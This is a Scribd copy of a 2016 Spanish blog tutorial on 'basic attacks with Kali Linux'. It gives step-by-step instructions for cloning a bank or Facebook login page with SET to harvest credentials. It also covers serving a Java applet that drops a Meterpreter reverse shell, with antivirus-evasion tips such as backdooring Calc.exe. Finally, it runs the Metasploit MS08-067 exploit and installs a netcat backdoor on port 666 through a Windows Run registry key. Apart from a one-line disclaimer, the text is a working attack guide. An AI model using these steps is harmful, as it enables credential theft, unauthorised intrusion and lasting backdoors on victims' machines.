Scribd Logo
Cargar

¡Te damos la bienvenida a Scribd!

  • 318 vistas

    Ataques Básicos Con Kali Linux - Ravmn

    Cargado por

    hgola
    El documento describe tres ataques básicos que se pueden realizar con Kali Linux: 1) phishing mediante la clonación de un sitio web para robar credenciales, 2) creación de una página web maliciosa que instala una puerta trasera al descargar un archivo, 3) uso de Metasploit para explotar vulnerabilidades de red y obtener acceso remoto a otra máquina. Se enfatiza que estas actividades solo deben realizarse con permiso y con fines educativos.

    Copyright:

    © All Rights Reserved
    Descargue como PDF, TXT o lea en línea desde Scribd

    Ataques Básicos Con Kali Linux - Ravmn

    Cargado por

    hgola
    318 vistas6 páginas
    El documento describe tres ataques básicos que se pueden realizar con Kali Linux: 1) phishing mediante la clonación de un sitio web para robar credenciales, 2) creación de una página web maliciosa que instala una puerta trasera al descargar un archivo, 3) uso de Metasploit para explotar vulnerabilidades de red y obtener acceso remoto a otra máquina. Se enfatiza que estas actividades solo deben realizarse con permiso y con fines educativos.

    Descripción original:

    ejemplos de ataques en kali linux

    Título original

    Ataques Básicos Con Kali Linux _ Ravmn

    Derechos de autor

    © © All Rights Reserved

    Formatos disponibles

    PDF, TXT o lea en línea desde Scribd

    ¿Le pareció útil este documento?

    ¿Este contenido es inapropiado?

    El documento describe tres ataques básicos que se pueden realizar con Kali Linux: 1) phishing mediante la clonación de un sitio web para robar credenciales, 2) creación de una página web maliciosa que instala una puerta trasera al descargar un archivo, 3) uso de Metasploit para explotar vulnerabilidades de red y obtener acceso remoto a otra máquina. Se enfatiza que estas actividades solo deben realizarse con permiso y con fines educativos.

    Copyright:

    © All Rights Reserved
    Descargue como PDF, TXT o lea en línea desde Scribd
    Descargar como pdf o txt
    318 vistas6 páginas

    Ataques Básicos Con Kali Linux - Ravmn

    Cargado por

    hgola
    El documento describe tres ataques básicos que se pueden realizar con Kali Linux: 1) phishing mediante la clonación de un sitio web para robar credenciales, 2) creación de una página web maliciosa que instala una puerta trasera al descargar un archivo, 3) uso de Metasploit para explotar vulnerabilidades de red y obtener acceso remoto a otra máquina. Se enfatiza que estas actividades solo deben realizarse con permiso y con fines educativos.

    Copyright:

    © All Rights Reserved
    Descargue como PDF, TXT o lea en línea desde Scribd
    Descargar como pdf o txt
    Está en la página 1de 6

    19/6/2016

    Ataques bsicos con Kali Linux | ravmn

    SIN ESFUERZO PERO CON CALIDAD

    Ataques bsicos con Kali Linux


    13 F EB RERO, 2016 ( HTTP ://WWW.RAV MN.CL /CONTENT/ATAQU ES-B ASICOS-CON-K AL I-L INU X ) B Y RAV MN
    ( HTTP ://WWW.RAV MN.CL /CONTENT/AU THOR/RAV MN) 0 COMENTARIOS
    ( HTTP ://WWW.RAV MN.CL /CONTENT/ATAQU ES-B ASICOS-CON-K AL I-L INU X # RESP OND)

    En esta ocasin compartiremos tres procedimientos a realizar con herramientas


    incluidas en Kali Linux. Primero vamos a copiar un sitio web para que el usuario nos
    escriba su contrasea. A continuacin, Es importante realices estas actividades
    nicamente en redes en las que te encuentres autorizado a realizarlas, ya que su uso
    es sancionado. Esta publicacin es nicamente para fines educativos y demostrativos,
    no nos responsabilizamos por el uso que le des.

    Phishing e ingeniera social


    Los mtodos ms sencillos para ganar acceso al computador de la vctima implican la
    entrega de datos dirctamente por parte de esta o la suplantacin de identidad
    (phishing) mediante correos o sitios web que se camuflan como pertenecientes a una
    institucin de confianza (por ejemplo, un banco).

    Lo primero que practicaremos ser la clonacin de un sitio web para


    que el usuario nos entregue su contrasea. Para ello:
    1. Abrimos SET
    2. Elegimos 1 y apretamos enter (Social-Engineering Attacks)
    3. Ahora seleccionamos la 2 (Website Attack Vectors)
    4. Cargamos la nmero 3 (Credential Harvester Attack Method)
    5. Le sigue 2 (Site Cloner) y ponemos nuestra ip (Ej: 192.168.161.130)
    6. Ingresamos la direccin a copiar (Ej: http://facebook.com o la de un banco)
    7. Apretamos {return}

    http://www.ravmn.cl/content/ataques-basicos-con-kali-linux

    1/6

    19/6/2016

    Ataques bsicos con Kali Linux | ravmn

    En este momento tendremos un pgina igual al de la pgina que elegimos si es que


    alguien accede a nuestra ip desde un navegador web. La ingeniera social consiste en
    persuadir a la persona de ingresar a la pgina para que, en esta, ingrese sus datos
    personales. Al momento de ingresar sus datos ser dirigido al sitio real y pensar que
    ingres mal la contrasea usualmente sin sospechar.
    A nosotros, en pantalla nos aparecern las siguientes cadenas de texto: POSSIBLE
    USERNAME FIELD FOUND: email=CUENTA y POSSIBLE PASSWORD FIELD FOUND:
    pass=PASS (donde CUENTA y PASS irn los datos ingresados por el usuario).

    A continuacin, a travs de un proceso similar, crearemos una pgina


    que solicitar descargar un archivo para funcionar correctamente. Este
    archivo nos dar acceso temporal al sistema. Para ello:
    1. Abrimos SET
    2. Seleccionamos el nmero 1, (Social Engineering Attacks)
    3. A continuacin, el 2 (Website Attack Vectors)
    4. Luego 1 (Java Applet Attack Method). Esto crear una aplicacin Java para
    controlar la mquina.
    5. Ahora elegimos 1 (Web Templates) para crear una pgina genrica, o la opcin
    2 (Site Cloner) le permite a SET usar una web existente como plantilla.
    6. Ahora habremos de elegir 1 (Java Required)
    7. Elegimos un payload a enviar, usualmente se elite el 2 (Windows Reverse_TCP
    Meterpreter), pero se puede elegir el que se desee (tienen diferente efectividad).
    Por ejemplo, el nmero 13, ShellCodeExec Alphanum Shellcode difiere de
    otros porque corre desde la memoria, siendo efectivo contra la mayora de los
    programas antivirus.
    8. Ahora debemos decidir un tipo de codificacin para evitar programas antivirus.
    Shikata_ga_nai es muy popular, Multi-Encoder usa mltiples codificadores,
    pero el mejor es el 16 (Backdoored Executable). ste ltimo agrega el programa
    de puerta trasera a un programa legtimo como Calc.exe.
    9. Elige el puerto al cual escuchar (el predeterminado es suficiente). Ahora Kali
    Linux lo configura todo. Crea el programa, lo codifica y lo empaqueta. Al terminar
    vers una pantalla como esta:
    10. Ya estamos listos. Ahora, si una vctima ingresa a la IP de nuestro computador,
    se le solicitar correr una aplicacin Java para ver el sitio correctamente. Si la
    corre, tendremos una sesin remota a ese computador desde Backtrack:

    http://www.ravmn.cl/content/ataques-basicos-con-kali-linux

    2/6

    19/6/2016

    Ataques bsicos con Kali Linux | ravmn

    (http://i2.wp.com/cyberarms.files.wordpress.com/2011/12/backtrack5set4.png)
    11. Ahora que tenemos una puerta de acceso al PC, usemos Sessions -i y el
    nmero de sesin para conectarnos. Una vez conectados podemos usar
    comandos de Linux para navegar remotamente el PC, o correr shell para tener
    una lnea de comandos de Windows remota.

    (http://i1.wp.com/cyberarms.files.wordpress.com/2011/12/backtrack5set5.png)
    Eso es todo. El usuario puede cerrar el navegador y continuaremos conectados, porque
    una vez que la shell se conecta, no se requiere ms de la pgina web. La mayora de
    los atacantes solidificarn su conexin con el PC y unirn la sesin a otro proceso
    para hacer desaparecer el shell.

    Metasploit y ataque en red:


    Este mtodo, a diferencia del anterior, no requiere que el usuario cargue una pgina.
    Nosotros nos meteremos a su computador por la fuerza.
    Para preparar Kali Linux para el proceso debemos correr dos comandos (activar los
    procesos apache y ssh):
    /etc/init.d/apache2 start
    /etc/init.d/ssh start
    sshd generate

    Ahora empezaremos por reconocer a quien atacaremos.

    http://www.ravmn.cl/content/ataques-basicos-con-kali-linux

    3/6

    19/6/2016

    Ataques bsicos con Kali Linux | ravmn

    Ahora empezaremos por reconocer a quien atacaremos.


    Para saber ms informacin de la vctima, habremos de correr nmap, herramienta
    que escanea puertos abiertos y permite conocer servicios en ejecucin y el sistema
    operativo del objetivo. Para ello, usaremos el comando
    nmap -e eth0 -PN -S IPNUESTRA -sV -O IPVICTIMA (Reemplazar IPNUESTRA con
    una IP falsa para encubrirnos e IP VICTIMA por la IP del objetivo).
    Otra herramienta que puede sernos de utilidad es Lanmap, ya que nos genera una
    imagen de como vendra a estar armada la red (Nos crea un mapa con los routers y
    computadores existentes). Se utiliza mediante
    lanmap -v -i eth0 -r 30 -T png -o /root/ (La imagen ser guardada en /root)

    Explotando vulnerabilidades:
    Ahora, usando de base lo recolectado, podemos pasar a armar el ataque con
    metasploit. Esta herramienta permite explotar una grandsima cantidad de fallos
    conocidos en los sistemas para darnos acceso remoto a la mquina.
    Como ejemplo, para explotar una vulnerabilidad en el puerto 445 debemos seleccionar
    lo siguiente en metasplot (se debe cambiar IPVICTIMA e IPNUESTRA por los valores
    que correspondan):
    use windows/smb/ms08_067_netapi
    set payload windows/meterpreter/reverse_tcp
    set RHOST IPVICTIMA
    set LHOST IPNUESTRA
    exploit (inicia el ataque y debiera darnos acceso a una lnea de comandos de
    Windows)

    Afianzando la conexin
    El ataque anterior dura hasta que la vctima o el atacante se desconecte. Para permitir
    acceso futuros se han de habilitar puertas traseras. Para esto se usa la herramienta
    netcat.
    Primero enviaremos netcat al computador vctima con:
    upload /root/nc.exe C:\\Windows\\System32\\
    Luego registraremos netcat para que inicie con Windows y nos habilite el puerto 666
    para permitirnos entrar cuando querramos:
    http://www.ravmn.cl/content/ataques-basicos-con-kali-linux

    4/6

    19/6/2016

    Ataques bsicos con Kali Linux | ravmn

    reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v


    Lab
    Backtrack -d C:\Windows\System32\nc.exe -L -d -p 666 -e cmd.exe
    Ahora podemos reiniciar con reboot y debiramos podernos conectar mediante
    netcat o metasploit directamente a la puerta trasera (puerto 666 en este caso).

    Anterior

    Desbloqueo de Nintendo Wii (http://www.ravmn.cl/content/desbloqueo-denintendo-wii)

    DEJA UN COMENTARIO
    Tu direccin de correo electrnico no ser publicada. Los campos obligatorios estn
    marcados con *

    Nombre *

    Correo electrnico *

    Web

    Publicar comentario

    Con la tecnologa de WordPress (http://wordpress.org/). Tema: Flat 1.7.6 por Themeisle


    http://www.ravmn.cl/content/ataques-basicos-con-kali-linux

    5/6

    19/6/2016

    Ataques bsicos con Kali Linux | ravmn

    (https://themeisle.com/themes/flat/).

    http://www.ravmn.cl/content/ataques-basicos-con-kali-linux

    6/6

    También podría gustarte